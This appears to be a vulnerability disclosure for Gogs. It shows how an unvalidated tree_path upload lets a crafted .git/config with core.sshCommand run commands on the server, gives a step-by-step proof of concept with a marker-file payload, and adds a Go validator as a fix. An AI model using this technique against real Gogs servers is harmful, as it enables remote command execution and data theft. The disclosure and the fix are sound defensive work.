When uploading a file to a repository in Gogs, the tree_path parameter is not validated. An attacker can set tree_path=/.git/ to upload a file into the .git directory.
By rewriting the .git/config file and setting core.sshCommand, the attacker achieves remote command execution.
Create a repository in Gogs, then upload a file named config to the repository through the web page:
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
ignorecase = true
precomposeunicode = true
sshCommand = echo pwnned > /tmp/poc
[remote "origin"]
url = [email protected]:torvalds/linux.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master
Intercept the HTTP POST request that submits the form, and set the parameter tree_path=/.git/ in the request body.
A file containing the text pwnned is then created at /tmp/poc.
This vulnerability allows an attacker to execute commands on the remote server and gain the privileged user account, which leads to sensitive data exposure, identity theft, etc.
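The missing check on tree_path can be illustrated with a server-side validator. This is an added example, not code from the Gogs project or from the original report; CleanTreePath and ErrGitPath are hypothetical names. It normalizes the submitted path and rejects any path with a .git component, including case variants, since the config above sets ignorecase = true.

```go
package main

import (
	"errors"
	"fmt"
	"path"
	"strings"
)

// ErrGitPath is returned when an upload path would land inside .git.
var ErrGitPath = errors.New("tree path points into .git")

// CleanTreePath (hypothetical helper) normalizes a user-supplied tree_path
// and rejects it if any path component names the .git directory.
func CleanTreePath(treePath string) (string, error) {
	// Treat backslashes as separators so "\.git\" is caught as well.
	p := strings.ReplaceAll(treePath, "\\", "/")
	// Rooting the path before Clean stops ".." from climbing above the
	// repository root; the leading slash is dropped again afterwards.
	p = strings.TrimPrefix(path.Clean("/"+p), "/")
	for _, part := range strings.Split(p, "/") {
		// Compare case-insensitively and ignore trailing dots and spaces,
		// which some filesystems strip when the directory is opened.
		name := strings.ToLower(strings.TrimRight(part, ". "))
		if name == ".git" {
			return "", ErrGitPath
		}
	}
	return p, nil
}

func main() {
	// Constructed sample inputs; the first is the value from the report.
	samples := []string{"/.git/", "docs/../.GIT/hooks", "src/lib", ".github/workflows"}
	for _, tp := range samples {
		clean, err := CleanTreePath(tp)
		fmt.Printf("%-22q -> %q, err=%v\n", tp, clean, err)
	}
}
```

The check belongs in the upload handler before the file is written, and the returned cleaned path, not the raw parameter, is what should be joined to the repository working directory.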